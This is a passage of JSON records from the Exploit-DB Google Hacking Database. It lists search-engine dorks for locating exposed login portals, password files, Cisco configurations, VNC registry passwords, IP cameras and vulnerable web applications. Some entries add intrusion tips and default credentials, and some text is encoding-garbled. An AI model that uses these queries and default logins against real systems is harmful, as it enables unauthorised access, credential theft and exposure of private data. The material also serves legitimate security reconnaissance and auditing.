"http://www.google.com/search?q=%22bp+blog+admin%22+intitle:login+%7C+intitle:admin+-site:johnny.ihackstuff.com&num=100&hl=en&lr=&c2coff=1&filter=0", "shortDescription": "\"bp blog admin\" intitle:login | intitle:admin -site:johnny.ihackstuff.com", "textualDescription": "betaparticle (bp) blog is blog software coded in asp. This google dork finds the admin logins." }, { "signatureReferenceNumber": "1238", "link": "https://www.exploit-db.com/ghdb/1238/", "category": "Files containing passwords", "querystring": "http://www.google.com/search?q=inurl:%22editor/list.asp%22+%7C+inurl:%22database_editor.asp%22+%7C+inurl:%22login.asa%22+%22are+set%22&num=100&hl=en&lr=&filter=0", "shortDescription": "inurl:\"editor/list.asp\" | inurl:\"database_editor.asp\" | inurl:\"login.asa\" \"are set\"", "textualDescription": "This search finds CLEARTEXT usernames/passwords for the Results Database Editor. The log in portal can be found at /editor/login.asp. At time of submitting there are 21 results.Also a search for the logins:inurl:\"Results/editor/login.asp\"\"Database Editor Login\" \"Results Page\"" }, { "signatureReferenceNumber": "1239", "link": "https://www.exploit-db.com/ghdb/1239/", "category": "Files containing passwords", "querystring": "http://www.google.com/search?q=ext:passwd+-intext:the+-sample+-example&filter=0", "shortDescription": "ext:passwd -intext:the -sample -example", "textualDescription": "Various encrypted passwords, some plaintext passwords and some private keys are revealed by this search." }, { "signatureReferenceNumber": "1240", "link": "https://www.exploit-db.com/ghdb/1240/", "category": "Files containing passwords", "querystring": "http://www.google.com/search?q=enable+password+%7C+secret+%22current+configuration%22+-intext%3Athe&filter=0", "shortDescription": "enable password | secret \"current configuration\" -intext:the", "textualDescription": "Another Cisco configuration search. This one is cleaner, gives complete configuration files and it catches plaintext, \"secret 5\" and \"password 7\" passwords." }, { "signatureReferenceNumber": "1241", "link": "https://www.exploit-db.com/ghdb/1241/", "category": "Files containing passwords", "querystring": "http://www.google.com/search?q=ext:asa+%7C+ext:bak+intext:uid+intext:pwd+-%22uid..pwd%22+database+%7C+server+%7C+dsn&filter=0", "shortDescription": "ext:asa | ext:bak intext:uid intext:pwd -\"uid..pwd\" database | server | dsn", "textualDescription": "search for plaintext database credentials in ASA and BAK files." }, { "signatureReferenceNumber": "1242", "link": "https://www.exploit-db.com/ghdb/1242/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=intext:%22PhpGedView+Version%22+intext:%22final+-+index%22+-inurl:demo&hl=en&lr=&start=30&sa=N", "shortDescription": "intext:\"PhpGedView Version\" intext:\"final - index\" -inurl:demo", "textualDescription": "PHPGedView" }, { "signatureReferenceNumber": "1243", "link": "https://www.exploit-db.com/ghdb/1243/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=it&q=intext%3A%22Powered+by+DEV+web+management+system%22+-dev-wms.sourceforge.net+-demo&btnG=Cerca&lr=", "shortDescription": "intext:\"Powered by DEV web management system\" -dev-wms.sourceforge.net -demo", "textualDescription": "DEV cms" }, { "signatureReferenceNumber": "1244", "link": "https://www.exploit-db.com/ghdb/1244/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=intitle:%22phpDocumentor+web+interface%22&hl=it&lr=&start=10&sa=N&filter=0", "shortDescription": "intitle:\"phpDocumentor web interface\"", "textualDescription": "Php Documentor < = 1.3.0 rc4 remote code xctn dork: intitle:\"phpDocumentor web interface\"advisory & poc exploit:http://rgod.altervista.org/phpdocumentor_130rc4_incl_expl.html" }, { "signatureReferenceNumber": "1245", "link": "https://www.exploit-db.com/ghdb/1245/", "category": "Footholds", "querystring": "http://www.google.com/search?q=inurl:%22tmtrack.dll%3F%22&hl=de&lr=&start=0&sa=N", "shortDescription": "inurl:\"tmtrack.dll?\"", "textualDescription": "This query shows installations of Serena Teamtrack. (www.serena.com).You may be able to adjust the application entry point, by providing a command after the \"tmtrack.dll?\" like thistmtrack.dll?LoginPagetmtrack.dll?View&Template=viewand more." }, { "signatureReferenceNumber": "1246", "link": "https://www.exploit-db.com/ghdb/1246/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?hl=en&ie=ISO-8859-1&q=%22intitle%3A3300+Integrated+Communications+Platform%22+inurl%3Amain.htm&btnG=Google+Search", "shortDescription": "\"intitle:3300 Integrated Communications Platform\" inurl:main.htm", "textualDescription": "logon portal to the mitel 330 integrated communications platform.[Mitel\u00c3\u0192\u00e2\u20ac\u0161\u00c3\u201a\u00c2\u00ae 3300 Integrated Communications Platform (ICP) provides enterprises with a highly scalable, feature-rich communications system designed to support businesses from 30-60,000 users. ...supporting networking standards such as Q.SIG, DPNSS, and MSDN .... enable their legacy PBX's, ]" }, { "signatureReferenceNumber": "1247", "link": "https://www.exploit-db.com/ghdb/1247/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?q=intitle%3AOvislink+inurl%3Aprivate%2Flogin+&sourceid=mozilla-search&start=0&start=0&ie=utf-8&oe=utf-8&client=firefox-a&rls=org.mozilla:en-US:official", "shortDescription": "intitle:Ovislink inurl:private/login", "textualDescription": "Ovislink vpn login page." }, { "signatureReferenceNumber": "1248", "link": "https://www.exploit-db.com/ghdb/1248/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?q=intitle%3A%22%3A%3A%3A%3A%3A+INTELLINET+IP+Camera+Homepage+%3A%3A%3A%3A%3A%22+OR+inurl%3A%2Fmain_activex.asp+OR+inurl%3A%2Fmain_applet.cgi&sourceid=mozilla-search&start=0&start=0&ie=utf-8&oe=utf-8&client=firefox-a&rls=org.m", "shortDescription": "intitle:\"::::: INTELLINET IP Camera Homepage :::::\" OR inurl:/main_activex.asp OR inurl:/main_applet.cgi", "textualDescription": "A variation on Jeffball55's original Intellinet Ip Camera.This search finds several more web cams.A suggested secondary search:\"Administrator Menu\" \"camera Name\" \"Location\" \"frame rate\" intitle:network.camera -pdfThanks jeffball." }, { "signatureReferenceNumber": "1249", "link": "https://www.exploit-db.com/ghdb/1249/", "category": "Vulnerable Servers", "querystring": "http://www.google.com/search?q=filetype%3Apl+intitle%3A%22Ultraboard+Setup%22&sourceid=mozilla-search&start=0&start=0&ie=utf-8&oe=utf-8&client=firefox-a&rls=org.mozilla:en-US:official", "shortDescription": "filetype:pl intitle:\"Ultraboard Setup\"", "textualDescription": "setup pages to the ultraboard system." }, { "signatureReferenceNumber": "1250", "link": "https://www.exploit-db.com/ghdb/1250/", "category": "Sensitive Directories", "querystring": "http://www.google.com/search?q=inurl:install.pl+intext:%22Reading+path+paramaters%22+-edu&hl=en&hs=cFH&lr=&safe=off&client=firefox-a&rls=org.mozilla:en-US:official&filter=0", "shortDescription": "inurl:install.pl intext:\"Reading path paramaters\" -edu", "textualDescription": "Excelent information for foot holds. Everything from OS, to forum software, etc. Other exploits possible" }, { "signatureReferenceNumber": "1251", "link": "https://www.exploit-db.com/ghdb/1251/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?q=inurl%3Abuild.err+&sourceid=mozilla-search&start=0&start=0&ie=utf-8&oe=utf-8&client=firefox-a&rls=org.mozilla:en-US:official", "shortDescription": "inurl:build.err", "textualDescription": "General build error file. Can tell what modules are installed, the OS the compiler the language, in theory usernames and passwords could probably be found too." }, { "signatureReferenceNumber": "1252", "link": "https://www.exploit-db.com/ghdb/1252/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?q=intext%3AViewCVS+inurl%3ASettings.php+&sourceid=mozilla-search&start=0&start=0&ie=utf-8&oe=utf-8&client=firefox-a&rls=org.mozilla:en-US:official", "shortDescription": "intext:ViewCVS inurl:Settings.php", "textualDescription": "CVs is a software used to keep track of changes to websites. You can review all updates and previous files wihtout actualy loging into CVS. It is possible to see password files, directory structure, how often is the website updated, previous code find exploits, etc." }, { "signatureReferenceNumber": "1253", "link": "https://www.exploit-db.com/ghdb/1253/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?q=%22Powered+by+Midmart+Messageboard%22+%22Administrator+Login%22&sourceid=mozilla-search&start=0&start=0&ie=utf-8&oe=utf-8&client=firefox-a&rls=org.mozilla:en-US:official", "shortDescription": "\"Powered by Midmart Messageboard\" \"Administrator Login\"", "textualDescription": "Midmart Messageboard lets you run a highly customizable bulletin board with a very nice user interface (similar to Yahoo Clubs) on your web site in few minutes. Many other features included. Rar found it murfie cleaned it up." }, { "signatureReferenceNumber": "1254", "link": "https://www.exploit-db.com/ghdb/1254/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=inurl:install.pl+intitle:GTchat+&hl=en&hs=yTH&lr=&safe=off&client=firefox-a&rls=org.mozilla:en-US:official&filter=0", "shortDescription": "inurl:install.pl intitle:GTchat", "textualDescription": "Gtchat install file.You can disable the chat program or change the language without a admin username or password. You can also point the chatroom information to a different URL in theory using a crosscript to take over the the chatroom." }, { "signatureReferenceNumber": "1255", "link": "https://www.exploit-db.com/ghdb/1255/", "category": "Vulnerable Servers", "querystring": "http://www.google.com.my/search?hl=en&q=inurl%3ArpSys.html&btnG=Google+Search&meta=", "shortDescription": "inurl:rpSys.html", "textualDescription": "Web configuration pages for various types of systems. Many of these systems are not password protected." }, { "signatureReferenceNumber": "1256", "link": "https://www.exploit-db.com/ghdb/1256/", "category": "Vulnerable Servers", "querystring": "http://www.google.com/search?num=100&hl=en&lr=&safe=off&rls=GBSA%2CGBSA%3A2006-05%2CGBSA%3Aen&q=intitle%3A%22Horde+%3A%3A+My+Portal%22+-%22%5BTickets%22&btnG=Search", "shortDescription": "intitle:\"Horde :: My Portal\" -\"[Tickets\"", "textualDescription": "Hi It will give you administrative ownership over Horde webmail system plus all users in Horde webmail system.. also php shell :) and much more ...Edited by CP" }, { "signatureReferenceNumber": "1257", "link": "https://www.exploit-db.com/ghdb/1257/", "category": "Files containing passwords", "querystring": "http://www.google.com/search?hl=en&lr=lang_en&q=filetype%3Areg+reg+%2Bintext%3A%E2%80%9DWINVNC3%E2%80%9D&lr=lang_en", "shortDescription": "filetype:reg reg +intext:\u00c3\u0192\u00c2\u00a2\u00c3\u00a2\u00e2\u20ac\u0161\u00c2\u00ac\u00c3\u201a\u00c2\u009dWINVNC3\u00c3\u0192\u00c2\u00a2\u00c3\u00a2\u00e2\u20ac\u0161\u00c2\u00ac\u00c3\u201a\u00c2\u009d", "textualDescription": "This can be used to get encoded vnc passwords which can otherwise be obtained by a local registry and decoded by cain & abel. The query find registry entries which can otherwise be found can locally in:\\HKEY_CURRENT_USER\\Software\\ORL\\WinVNC3\\Password or\\HKEY_USERS\\.DEFAULT\\Software\\ORL\\WinVNC3\\PasswordIf you are a cain and abel user you'll and have used this feature before you will know how useful this query is. Other than decoded passwords you can also find other useful information on the VNC server and its security. I have successfully gained access to many VNC servers." }, { "signatureReferenceNumber": "1258", "link": "https://www.exploit-db.com/ghdb/1258/", "category": "Footholds", "querystring": "http://www.google.com/search?ie=ISO-8859-1&q=%22Please+re-enter+your+password+It+must+match+exactly%22&btnG=Google+Search", "shortDescription": "\"Please re-enter your password It must match exactly\"", "textualDescription": "Invision Powerboard registration pages. Plain and simple." }, { "signatureReferenceNumber": "1259", "link": "https://www.exploit-db.com/ghdb/1259/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?q=intext:%22Fill+out+the+form+below+completely+to+change+your+password+and+user+name.+If+new+username+is+left+blank,+your+old+one+will+be+assumed.%22+-edu+-gov+-mil&hl=en&lr=&start=180&sa=N&filter=0", "shortDescription": "intext:\"Fill out the form below completely to change your password and user name. If new username is left blank, your old one will be assumed.\" -edu", "textualDescription": "The page to change admin passwords. Minor threat but the place to start an attack." }, { "signatureReferenceNumber": "1260", "link": "https://www.exploit-db.com/ghdb/1260/", "category": "Network or vulnerability data", "querystring": "http://www.google.com/search?q=inurl:CrazyWWWBoard.cgi+intext:%22detailed+debugging+information%22&hl=en&lr=&start=10&sa=N&filter=0", "shortDescription": "inurl:CrazyWWWBoard.cgi intext:\"detailed debugging information\"", "textualDescription": "gives tons of private forum configuration information.examples: Global variables installed, what groups the default user, guest and admin belong to, file paths, OS and appache versions, encypted admin password.Also Crazyboard has known vulnerabilities." }, { "signatureReferenceNumber": "1261", "link": "https://www.exploit-db.com/ghdb/1261/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?q=intext:%22Welcome+to+Taurus%22+%22The+Taurus+Server+Appliance%22+intitle:%22The+Taurus+Server+Appliance%22&hl=en&lr=&client=firefox-a&rls=org.mozilla:en-US:official&filter=0", "shortDescription": "intext:\"Welcome to Taurus\" \"The Taurus Server Appliance\" intitle:\"The Taurus Server Appliance\"", "textualDescription": "Celestix Networks, Inc., the premier supplier of network server appliance, announces the Taurus(TM) Server Appliance, the all-in-one networking solution for the small to midsize business. The Taurus(TM) Server Appliance offers no compromise on functionality and scalability, and provides optimum efficiency at a lower price than traditional servers.With a single purchase, up to 250 users have integrated file and peripheral sharing, high-speed Internet access, email, scheduled back-up, VPN and secure firewall, anti-virus engine, and Intranet. Standard with built-in networking software and optimized applications, the Taurus(TM) supplies up to 40-GB of Internal storage. Seperate Admin and root password. Root password must be changed from the command prompt which means most Sysadmins won't change it from Default. Manuel hosted by the device no password needed." }, { "signatureReferenceNumber": "1262", "link": "https://www.exploit-db.com/ghdb/1262/", "category": "Web Server Detection", "querystring": "http://www.google.com/search?q=inurl:wl.exe+inurl:%3FSS1%3D+intext:%22Operating+system:%22+-edu+-gov+-mil&hl=en&lr=&start=90&sa=N&filter=0", "shortDescription": "inurl:wl.exe inurl:?SS1= intext:\"Operating system:\" -edu -gov -mil", "textualDescription": "List server apparently keeps track of many clients, not just Domains and hardware, but Operating systems as well. As always this information is able to be gained by Zero Packet methods." }, { "signatureReferenceNumber": "1263", "link": "https://www.exploit-db.com/ghdb/1263/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?q=inurl:setdo.cgi+intext:%22Set+DO+OK%22&hl=en&hs=hLE&lr=&client=firefox-a&rls=org.mozilla:en-US:official&filter=0", "shortDescription": "inurl:setdo.cgi intext:\"Set DO OK\"", "textualDescription": "Dcs-2100 camerasBy removing \"intext:Set DO OK\" you will get more hits but they will require a login. Set DO OK is almost always admin access, you will need to go to the root of the URL to use the camera." }, { "signatureReferenceNumber": "1264", "link": "https://www.exploit-db.com/ghdb/1264/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.it/search?hs=lK5&hl=it&client=firefox-a&rls=org.mozilla%3Ait%3Aofficial&q=intitle%3A%224images+-+Image+Gallery+Management+System%22+and+intext%3A%22Powered+by+4images+1.7.1%22&btnG=Cerca&meta=", "shortDescription": "intitle:\"4images - Image Gallery Management System\" and intext:\"Powered by 4images 1.7.1\"", "textualDescription": "Find web app: 4Images = 1.7.1This web app is vulenrable to remote code execution exploit.The url of exploit is this: http://milw0rm.com/id.php?id=1533Good hackingBy HaVoC" }, { "signatureReferenceNumber": "1265", "link": "https://www.exploit-db.com/ghdb/1265/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?num=100&hl=en&lr=&safe=off&q=%22not+for+public+release%22+-.edu+-.gov+-.mil&btnG=Search", "shortDescription": "\"not for public release\" -.edu -.gov -.mil", "textualDescription": "if you search through lots of these then you find some really juicy things, there files from police, airports, government companies all kind of stuff that is not meant to be seen by normal people." }, { "signatureReferenceNumber": "1266", "link": "https://www.exploit-db.com/ghdb/1266/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?num=100&hl=en&lr=&safe=off&q=%28intitle%3A%22metaframe+XP+Login%22%29%7C%28intitle%3A%22metaframe+Presentation+server+Login%22%29&btnG=Search", "shortDescription": "(intitle:\"metaframe XP Login\")|(intitle:\"metaframe Presentation server Login\")", "textualDescription": "Once you input any username, you'll get an error message. Try putting a script with some other fun commands in it. Just send some info off to be logged.If exploited correctly, could give you admin access to a network." }, { "signatureReferenceNumber": "1267", "link": "https://www.exploit-db.com/ghdb/1267/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?rls=en&q=inurl:ids5web&ie=utf-8&oe=utf-8", "shortDescription": "inurl:ids5web", "textualDescription": "EasyAccess Web is a application to view radiological images online.Like in hospitals or universities.Problem is the default administrative login: wadm/wadmBe able to watch sensitive data and images.very bad..." }, { "signatureReferenceNumber": "1268", "link": "https://www.exploit-db.com/ghdb/1268/", "category": "Files containing passwords", "querystring": "http://www.google.com/search?hl=en&lr=&q=filetype%3Asql+%22insert+into%22+%28pass%7Cpasswd%7Cpassword%29&btnG=Search", "shortDescription": "filetype:sql \"insert into\" (pass|passwd|password)", "textualDescription": "Looks for SQL dumps containing cleartext or encrypted passwords." }, { "signatureReferenceNumber": "1269", "link": "https://www.exploit-db.com/ghdb/1269/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=en&q=%22Powered+by+Simplog%22&btnG=Google+Search", "shortDescription": "\"Powered by Simplog\"", "textualDescription": "searches for simplog which has directory traversal and XSS velnerabilites in version" }, { "signatureReferenceNumber": "1270", "link": "https://www.exploit-db.com/ghdb/1270/", "category": "Footholds", "querystring": "http://www.google.com/search?hl=en&q=%22index+of+%2F%22+%28+upload.cfm+%7C+upload.asp+%7C+upload.php+%7C+upload.cgi+%7C+upload.jsp+%7C+upload.pl+%29&btnG=Google+Search", "shortDescription": "\"index of /\" ( upload.cfm | upload.asp | upload.php | upload.cgi | upload.jsp | upload.pl )", "textualDescription": "searches for scripts that let you upload files which you can then execute on the server." }, { "signatureReferenceNumber": "1271", "link": "https://www.exploit-db.com/ghdb/1271/", "category": "Pages containing login portals", "querystring": "http://www.google.co.uk/search?hl=en&q=inurl%3A%22%2Fadmin%2Fconfiguration.+php%3F%22+Mystore&meta=", "shortDescription": "inurl:\"/admin/configuration. php?\" Mystore", "textualDescription": "simply google inurl trick for Oscommerce for open administrator page.If no .htpassword is set for the admin folder of osCommerce then of course you can change any setting in the shop unless password security has been enabled on the admin console.Despite a few demo pages there are a few open admin pages for webshops.Simple patch if you are one is to place a .htpassword file in the root of the admin folder. -- J.R.Middleton" }, { "signatureReferenceNumber": "1272", "link": "https://www.exploit-db.com/ghdb/1272/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com.au/search?hl=en&client=firefox-a&rls=org.mozilla%3Aen-GB%3Aofficial_s&q=%22powered+by+sblog%22+%2B%22version+0.7%22&btnG=Search&meta=", "shortDescription": "\"powered by sblog\" +\"version 0.7\"", "textualDescription": "please go here for a writeup on the vulnerability.HTML injection.http://www.securityfocus.com/bid/17044" }, { "signatureReferenceNumber": "1273", "link": "https://www.exploit-db.com/ghdb/1273/", "category": "Network or vulnerability data", "querystring": "http://www.google.com/search?q=inurl:%22NmConsole/Login.asp%22+%7C+intitle:%22Login+-+Ipswitch+WhatsUp+Professional+2005%22+%7C+intext:%22Ipswitch+WhatsUp+Professional+2005+(SP1)%22+%22Ipswitch,+Inc%22+copyright+log+in+User+Name+password+%22Knowledge+Bas", "shortDescription": "inurl:\"NmConsole/Login.asp\" | intitle:\"Login - Ipswitch WhatsUp Professional 2005\" | intext:\"Ipswitch WhatsUp Professional 2005 (SP1)\" \"Ipswitch, Inc\"", "textualDescription": "Ipswitch Whats Up Monitoring 2005!This is a console for Network Monitoring, access beyond the portal will allow you to do various things, such as telnet to internal machines, reboot servers, gain server information such as IP address.If the Administrators have utilised WUG to its potential, they will have also made full Infrastructure MAPs available. Access beyond the portal is Gold Information, you would have access to information and services as if you were an Administrator.In addition, some of the links, allow you to go beyond the portal as a guest user, this still allows reconisance of various servers and details of them, including where they are located physically.For anybody that is interested, the Login Portal has a SQL based Backend." }, { "signatureReferenceNumber": "1274", "link": "https://www.exploit-db.com/ghdb/1274/", "category": "Error Messages", "querystring": "http://www.google.com/search?hl=en&lr=&safe=off&as_qdr=all&q=filetype%3Aasp++%2B+%22%5BODBC+SQL%22&btnG=Search", "shortDescription": "filetype:asp + \"[ODBC SQL\"", "textualDescription": "This search returns more than just the one I saw already here. This one will return all ODBC SQL error pages including all data returned in the error. The information can range from simple data such as the table/row queried to full Database name etc.An attacker could take this information and use it to gain a foot hold into the SQL server and could use the information for an SQL injection attack." }, { "signatureReferenceNumber": "1275", "link": "https://www.exploit-db.com/ghdb/1275/", "category": "Footholds", "querystring": "http://www.google.com/search?q=(intitle:%22WordPress+%E2%80%BA+Setup+Configuration+File%22)%7C(inurl:%22setup-config.php%3Fstep%3D%22)&num=100&hl=en&lr=&safe=off&filter=0", "shortDescription": "(intitle:\"WordPress \u00c3\u0192\u00c2\u00a2\u00c3\u00a2\u00e2\u20ac\u0161\u00c2\u00ac\u00c3\u201a\u00c2\u00ba Setup Configuration File\")|(inurl:\"setup-config.php?step=\")", "textualDescription": "Alter setup configuration files.add ?step=1" }, { "signatureReferenceNumber": "1276", "link": "https://www.exploit-db.com/ghdb/1276/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?q=intitle:%22Joomla+-+Web+Installer%22&num=100&hl=en&lr=&safe=off&filter=0", "shortDescription": "intitle:\"Joomla - Web Installer\"", "textualDescription": "Joomla! is a Content Management System (CMS) created by the same team that brought the Mambo CMS. This dork finds the Web Installer page. On newer versions, after you install, joomla asks to delete installation dir before to be functional.The Webinstaller gives an attacker information about the php configuration and rgod has even found a way to inject data into the configuration.php file, resulting in a DoS attack (see the forums for more info).The admin logon can be found searching: intitle:\"- Administration [Joomla]\" but there are no default passwords." }, { "signatureReferenceNumber": "1277", "link": "https://www.exploit-db.com/ghdb/1277/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?q=intitle:%22Webview+Logon+Page%22&filter=0", "shortDescription": "intitle:\"Webview Logon Page\"", "textualDescription": "This is the web interface for Alcatel's Omniswitch. Default login is: admin/switch." }, { "signatureReferenceNumber": "1278", "link": "https://www.exploit-db.com/ghdb/1278/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?num=50&q=%28intitle%3A%22PRTG+Traffic+Grapher%22+inurl%3A%22allsensors%22%29%7C%28intitle%3A%22PRTG+Traffic+Grapher+-+Monitoring+Results%22%29", "shortDescription": "(intitle:\"PRTG Traffic Grapher\" inurl:\"allsensors\")|(intitle:\"PRTG Traffic Grapher - Monitoring Results\")", "textualDescription": "PRTG Traffic Grapher is Windows software for monitoring and classifying bandwidth usage. It provides system administrators with live readings and long-term usage trends for their network devices. The most common usage is bandwidth usage monitoring, but you can also monitor many other aspects of your network like memory and CPU utilizations." }, { "signatureReferenceNumber": "1279", "link": "https://www.exploit-db.com/ghdb/1279/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?q=intitle:%22AR-*%22+%22browser+of+frame+dealing+is+necessary%22&filter=0", "shortDescription": "intitle:\"AR-*\" \"browser of frame dealing is necessary\"", "textualDescription": "A few Sharp printers .." }, { "signatureReferenceNumber": "1280", "link": "https://www.exploit-db.com/ghdb/1280/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?num=50&&q=intitle%3A%22WxGoos-%22+%28%22Camera+image%22%7C%2260+seconds%22+%29", "shortDescription": "intitle:\"WxGoos-\" (\"Camera image\"|\"60 seconds\" )", "textualDescription": "This is used in serverrooms and such where climate conditions are crucial to hardware health. If an attacker were to guess the password for the configuration page, then he can find POP3 passwords in plain text in the HTML source code.It runs on \"I.T. Watchdogs, Inc. Embedded Web Server\"" }, { "signatureReferenceNumber": "1281", "link": "https://www.exploit-db.com/ghdb/1281/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?q=intext:%22you+to+handle+frequent+configuration+jobs+easily+and+quickly%22+%7C+intitle:%22Show/Search+other+devices%22&num=100&filter=0", "shortDescription": "intext:\"you to handle frequent configuration jobs easily and quickly\" | intitle:\"Show/Search other devices\"", "textualDescription": "ELSA DSL lan modems." }, { "signatureReferenceNumber": "1282", "link": "https://www.exploit-db.com/ghdb/1282/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?q=intitle:%22NAS%22+inurl:indexeng.html&num=100&filter=0", "shortDescription": "intitle:\"NAS\" inurl:indexeng.html", "textualDescription": "Disk Online Server NAS device." }, { "signatureReferenceNumber": "1283", "link": "https://www.exploit-db.com/ghdb/1283/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22Thank+You+for+using+WPCeasy%22&filter=0", "shortDescription": "\"Thank You for using WPCeasy\"", "textualDescription": "There is a SQL injection vulnerability in WPC.easy, resulting in full admin access to any remote attacker. Vendor was notified. http://www.securityfocus.com/archive/1/425395" }, { "signatureReferenceNumber": "1284", "link": "https://www.exploit-db.com/ghdb/1284/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?q=intitle:%22Skystream+Networks+Edge+Media+Router%22+-securitytracker.com&filter=0", "shortDescription": "intitle:\"Skystream Networks Edge Media Router\" -securitytracker.com", "textualDescription": "skystream Networks Edge Media Router." }, { "signatureReferenceNumber": "1285", "link": "https://www.exploit-db.com/ghdb/1285/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?q=intitle:%22Ethernet+Network+Attached+Storage++Utility%22&num=100&filter=0", "shortDescription": "intitle:\"Ethernet Network Attached Storage Utility\"", "textualDescription": "Linksys network storage utility." }, { "signatureReferenceNumber": "1286", "link": "https://www.exploit-db.com/ghdb/1286/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?q=intitle:%22GigaDrive+Utility%22&num=50&filter=0", "shortDescription": "intitle:\"GigaDrive Utility\"", "textualDescription": "Linksys GigaDrive network storage utility." }, { "signatureReferenceNumber": "1287", "link": "https://www.exploit-db.com/ghdb/1287/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?hl=en&q=intitle%3A%22LOGREP+-+Log+file+reporting+system%22+-site%3Aitefix.no&btnG=Google+Search", "shortDescription": "intitle:\"LOGREP - Log file reporting system\" -site:itefix.no", "textualDescription": "Logrep is an open source log file Extraction and Reporting System by ITeF!x. This dork finds the logs that it creates." }, { "signatureReferenceNumber": "1288", "link": "https://www.exploit-db.com/ghdb/1288/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?q=inurl:2000+intitle:RemotelyAnywhere+-site:realvnc.com&num=100&hl=en&lr=&filter=0", "shortDescription": "inurl:2000 intitle:RemotelyAnywhere -site:realvnc.com", "textualDescription": "RemotelyAnywhere is a program that enables remote control, in the same matter as VNC. Once Logged in an attacker has almost complete control of the computer." }, { "signatureReferenceNumber": "1289", "link": "https://www.exploit-db.com/ghdb/1289/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?q=%22Web-Based+Management%22+%22Please+input+password+to+login%22+-inurl:johnny.ihackstuff.com&num=100&hl=en&lr=&filter=0", "shortDescription": "\"Web-Based Management\" \"Please input password to login\" -inurl:johnny.ihackstuff.com", "textualDescription": "This dork finds firewall/vpn products from fiber logic. They only require a one-factor authentication." }, { "signatureReferenceNumber": "1290", "link": "https://www.exploit-db.com/ghdb/1290/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?num=100&hl=en&lr=&q=intitle%3A%22DVR+Client%22+-the+-free+-pdf+-downloads+-blog+-download+-dvrtop&btnG=Search", "shortDescription": "intitle:\"DVR Client\" -the -free -pdf -downloads -blog -download -dvrtop", "textualDescription": "This dork finds digital video recording client from Nuvico." }, { "signatureReferenceNumber": "1291", "link": "https://www.exploit-db.com/ghdb/1291/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?q=%22OK+logout%22+inurl:vb.htm%3Flogout%3D1&num=100&hl=en&lr=&filter=0", "shortDescription": "\"OK logout\" inurl:vb.htm?logout=1", "textualDescription": "This is a google dork for Hunt Electronics web cams. To get to the cameras remove the vb.htm?logout=1 from the url." }, { "signatureReferenceNumber": "1292", "link": "https://www.exploit-db.com/ghdb/1292/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?num=100&hl=en&lr=&client=firefox-a&rls=org.mozilla%3Aen-US%3Aofficial_s&q=intitle%3A%22Edr1680+remote+viewer%22&btnG=Search", "shortDescription": "intitle:\"Edr1680 remote viewer\"", "textualDescription": "This search finds the 1680 series digital video recorder from EverFocus." }, { "signatureReferenceNumber": "1293", "link": "https://www.exploit-db.com/ghdb/1293/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?q=inurl:%22vsadmin/login%22+%7C+inurl:%22vsadmin/admin%22+inurl:.php%7C.asp++-%22Response.Buffer+%3D+True%22+-javascript&num=100&hl=en&lr=&safe=off&filter=0", "shortDescription": "inurl:\"vsadmin/login\" | inurl:\"vsadmin/admin\" inurl:.php|.asp -\"Response.Buffer = True\" -javascript", "textualDescription": "Ecommerce templates makes a online shopping cart solution. This search finds the admin login." }, { "signatureReferenceNumber": "1294", "link": "https://www.exploit-db.com/ghdb/1294/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?q=intitle:%22Login+to+%40Mail%22+(ext:pl+%7C+inurl:%22index%22)+-dwaffleman&num=100&hl=en&lr=&safe=off&client=firefox-a&rls=org.mozilla:en-US:official_s&filter=0", "shortDescription": "intitle:\"Login to @Mail\" (ext:pl | inurl:\"index\") -dwaffleman", "textualDescription": "Webmail is a http based email server made by atmail.com. To get to the admin login instead of regular login add webadmin/ to the url." }, { "signatureReferenceNumber": "1295", "link": "https://www.exploit-db.com/ghdb/1295/", "category": "Files containing passwords", "querystring": "http://www.google.com/search?q=inurl:%22calendarscript/users.txt%22&num=100&hl=en&lr=&filter=0", "shortDescription": "inurl:\"calendarscript/users.txt\"", "textualDescription": "CalenderScript is an overpriced online calender system written in perl. The passwords are encrypted using perl's crypt() function which I think DES encrypts things. However if the computer the calender script is on doesn't support the crypt function the are plaintext. Changing calender dates might not sound useful but people reuse passwords so who knows? Also search for the logins:intitle:\"Calendar Administration : Login\" | inurl:\"calendar/admin/index.asp\" -demo -demos Then to get the passwords change the url fromwxw.calendersiteexample.com/thissite/calendar_admin.cgitowxw.calendersiteexample.com/thissite/calendarscript/users.txt The defaults are anonymous/anonymous and Administrator/Administrator." }, { "signatureReferenceNumber": "1296", "link": "https://www.exploit-db.com/ghdb/1296/", "category": "Pages containing login portals", 